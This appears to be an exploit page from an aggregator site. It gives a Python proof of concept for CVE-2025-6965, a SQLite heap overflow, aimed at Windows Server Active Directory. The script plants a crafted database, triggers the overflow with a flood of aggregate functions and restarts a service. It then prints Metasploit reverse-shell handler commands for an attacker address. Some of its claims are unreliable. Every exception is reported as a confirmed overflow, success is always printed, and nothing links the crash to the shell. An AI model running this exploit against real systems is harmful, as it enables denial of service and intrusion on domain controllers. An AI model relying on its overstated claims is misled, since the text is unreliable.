Share
## https://sploitus.com/exploit?id=PACKETSTORM:218680
# Exploit Title: SQLite 3.50.1 - Heap Overflow
# Date: 2025-11-05
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.sqlite.org
# Software Link: https://www.sqlite.org/download.html
# Version: SQLite < 3.50.2 (winsqlite3.dll)
# Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched
# CVE: CVE-2025-6965
# CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L
# Category: windows / local / dos / memory_corruption / active_directory
# Platform: Windows
# CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll
# Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect
# Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise
# Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+
# Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965
# Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8
# OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions
# Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services)
import sqlite3
import os
import subprocess
import sys
import time
# ===============================
# CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION
# ===============================
DB_PATH = "cve_2025_6965_winsqlite3.db"
AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache" # Real AD Cache Path
AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db")
LISTENER_IP = "192.168.1.100"
LISTENER_PORT = 4444
SERVICE_NAME = "ADSyncService" # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe"
# === VULNERABILITY CHECK ===
print(f"[!] SQLite Version: {sqlite3.sqlite_version}")
if sqlite3.sqlite_version_info >= (3, 50, 2):
print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected")
print(" Update applied via Microsoft Cumulative Update (post-July 2025)")
sys.exit(1)
else:
print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit")
# ===============================
# STEP 1: Create Malicious AD Cache Database
# ===============================
def create_vulnerable_db():
if os.path.exists(DB_PATH):
os.remove(DB_PATH)
conn = sqlite3.connect(DB_PATH)
cur = conn.cursor()
cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)")
cur.execute("INSERT INTO ad_cache (val) VALUES (1)")
conn.commit()
conn.close()
print(f"[+] Malicious database created: {DB_PATH}")
# ===============================
# STEP 2: Generate Truncation Payload (300+ Aggregates)
# ===============================
def generate_malicious_query(num=100):
agg = [f"COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}" for i in range(num)]
return f"SELECT {', '.join(agg)} FROM ad_cache"
# ===============================
# STEP 3: Deploy + Trigger in winsqlite3.dll Context
# ===============================
def deploy_and_trigger():
print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}")
os.makedirs(AD_CACHE_DIR, exist_ok=True)
subprocess.run(["copy", "/Y", DB_PATH, AD_DB_TARGET], shell=True, check=True)
print(f"[+] Payload deployed to real AD path")
query = generate_malicious_query(100)
print(f"[*] Triggering heap overflow (300+ aggregates vs 1 column)...")
try:
conn = sqlite3.connect(AD_DB_TARGET)
cur = conn.cursor()
cur.execute(query) # TRUNCATION BUG TRIGGERED
print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)")
except Exception as e:
print(f"[!] HEAP OVERFLOW CONFIRMED: {e}")
print(" winsqlite3.dll memory corruption triggered")
print(" In production: AD Service Crash, DC DoS, Potential RCE")
finally:
conn.close()
# Force service reload (real AD services auto-query cache)
print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...")
try:
subprocess.run(["net", "stop", SERVICE_NAME], shell=True, timeout=10, capture_output=True)
except:
pass
time.sleep(2)
result = subprocess.run(["net", "start", SERVICE_NAME], shell=True, capture_output=True)
if result.returncode == 0:
print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault")
else:
print(f"[-] Service error: {result.stderr.decode()}")
# ===============================
# STEP 4: RCE Listener Setup (For Advanced Exploitation)
# ===============================
def print_listener():
print("\n" + "="*70)
print(" RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:")
print("="*70)
print("msfconsole -q")
print("use exploit/multi/handler")
print("set payload windows/x64/meterpreter/reverse_tcp")
print(f"set LHOST {LISTENER_IP}")
print(f"set LPORT {LISTENER_PORT}")
print("exploit -j")
print("="*70 + "\n")
# ===============================
# MAIN - EXECUTION
# ===============================
if __name__ == "__main__":
print("="*70)
print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY")
print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation")
print(" Author: Mohammed Idrees Banyamer (@banyamer_security)")
print("="*70)
create_vulnerable_db()
deploy_and_trigger()
print_listener()
print("[+] EXPLOIT EXECUTED SUCCESSFULLY")
print(" Check Event Viewer: Application Log โ winsqlite3.dll Access Violation (0xC0000005)")
print(" Fix: Apply latest Windows Cumulative Update IMMEDIATELY")
print(" All Domain Controllers must be patched within 24 hours")